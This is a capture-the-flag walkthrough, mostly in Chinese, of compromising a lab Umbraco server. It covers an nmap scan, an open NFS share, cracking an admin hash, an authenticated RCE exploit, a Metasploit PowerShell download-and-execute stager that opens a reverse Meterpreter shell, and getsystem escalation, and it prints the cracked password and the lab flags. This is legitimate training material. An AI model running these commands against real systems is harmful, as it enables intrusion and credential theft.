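# Full TCP port sweep. -Pn skips host discovery (the target may drop ping
# probes); with sudo the default scan type is already SYN (-sS).
# -oA keeps the raw output as evidence instead of relying on the terminal.
sudo nmap -Pn -p- -v -oA nmap_allports 10.129.95.194
# Service and OS detection on the ports found above. -A already implies
# -sV, -O, -sC and traceroute, so the redundant -sV is dropped.
sudo nmap -Pn -sS -A -v -p21,80,111,135,445,2049,49666 -oA nmap_services 10.129.95.194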
检查 FTP 是否允许匿名访问（anonymous 登录），以及目录里有没有可读/可写的文件。
登录页面http://10.129.95.194/umbraco/#/login
搜索该 CMS（Umbraco）的已知漏洞。
https://github.com/noraj/Umbraco-RCE
查看脚本所需参数。
该 PoC 是已认证 RCE，需要 Umbraco 后台账号密码，所以先要另找凭据来源。
端口 111（rpcbind）和 2049（NFS）开放，检查 NFS 导出列表。
列出可挂载的导出目录：showmount -e 10.129.95.194
导出了 /site_backups 目录，客户端列表为 (everyone)，即任意主机都可以挂载——这是 NFS 导出配置错误，等于把站点备份公开给了整个网络。
以只读方式挂载到本地查看（避免改动目标上的备份；用完后 sudo umount ./test）：mkdir -p ./test && sudo mount -t nfs -o ro 10.129.95.194:/site_backups ./test
.sdf 文件是 Microsoft SQL Server Compact（SQL CE）数据库文件，Umbraco 的用户账号和密码哈希就存在里面。
没有 SQL CE 客户端时，直接用 strings 提取可读字符串并 grep 用户名/邮箱关键字：
admin@htb.local b8be16afba8c314ad33d812f22a04991b90e2aaa
smith@htb.local jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts=
使用 john 破解。admin 的哈希是 40 位十六进制，符合未加盐的 SHA-1：john --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt ；smith 的值看起来是 base64 编码的加盐哈希（盐值和哈希两段拼接），不能直接按 Raw-SHA1 处理。
admin@htb.local baconandcheese
尝试登录
用破解出的 admin 凭据运行 Umbraco-RCE 脚本
成功执行命令
反弹shell
使用 Metasploit 的 web_delivery 生成一段 PowerShell 下载并执行的 stager，把生成的一行命令复制下来作为上一步脚本要执行的命令。target 2 即 PSH（PowerShell），stager 和 payload 只在内存中运行，不在磁盘落地；但 stager 是通过明文 HTTP 拉取的，而且 PowerShell 脚本块日志 / AMSI 仍可能记录到，所以“无文件”不等于免检测。
# Serves a stager over HTTP; the target fetches and runs it in memory.
use exploit/multi/script/web_delivery
# Target 2 = PSH: the generated one-liner is a PowerShell download/execute.
set target 2
# Staged 64-bit Meterpreter calling back over TCP (LPORT not set, so the
# module default applies).
set payload windows/x64/meterpreter/reverse_tcp
# Callback address the payload connects to (attacker IP).
set lhost 10.10.16.6
# Address/port the stager web server binds to; reachable from the target.
set srvhost 10.10.16.6
set srvport 8080
# Starts the server and prints the PowerShell command to paste into the PoC.
run
运行:
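# Run the Umbraco-RCE PoC with the cracked admin credentials. -c/-a are the
# command and arguments executed on the target; the -e value is the
# base64-encoded PowerShell one-liner printed by web_delivery's run above.
# Note: credentials on argv land in shell history and are visible via `ps`
# on a shared host; clear or limit history when working from a shared box.
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.129.95.194 \
  -c powershell.exe -a 'powershell.exe -nop -w hidden -e <BASE64_FROM_WEB_DELIVERY>'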
成功获取shell
查看用户权限
# List the token privileges of the current user. If SeImpersonatePrivilege is
# present, that is typically what named-pipe impersonation privesc (the
# technique meterpreter's getsystem tries) needs — confirm from the output.
whoami /priv
获取普通用户flag
fe36c86bc163fd028710e57b2d98f6f8
在 meterpreter 会话中执行 getsystem 提权到 SYSTEM。getsystem 会依次尝试几种本地提权技术（包括命名管道模拟），一般依赖上一步 whoami /priv 输出中的 SeImpersonatePrivilege；若失败，先回头确认该权限是否存在。
获取管理员flag
2f535d928cd95075403281b237301b05
参考文章 https://blog.csdn.net/weixin_45527786/article/details/112291073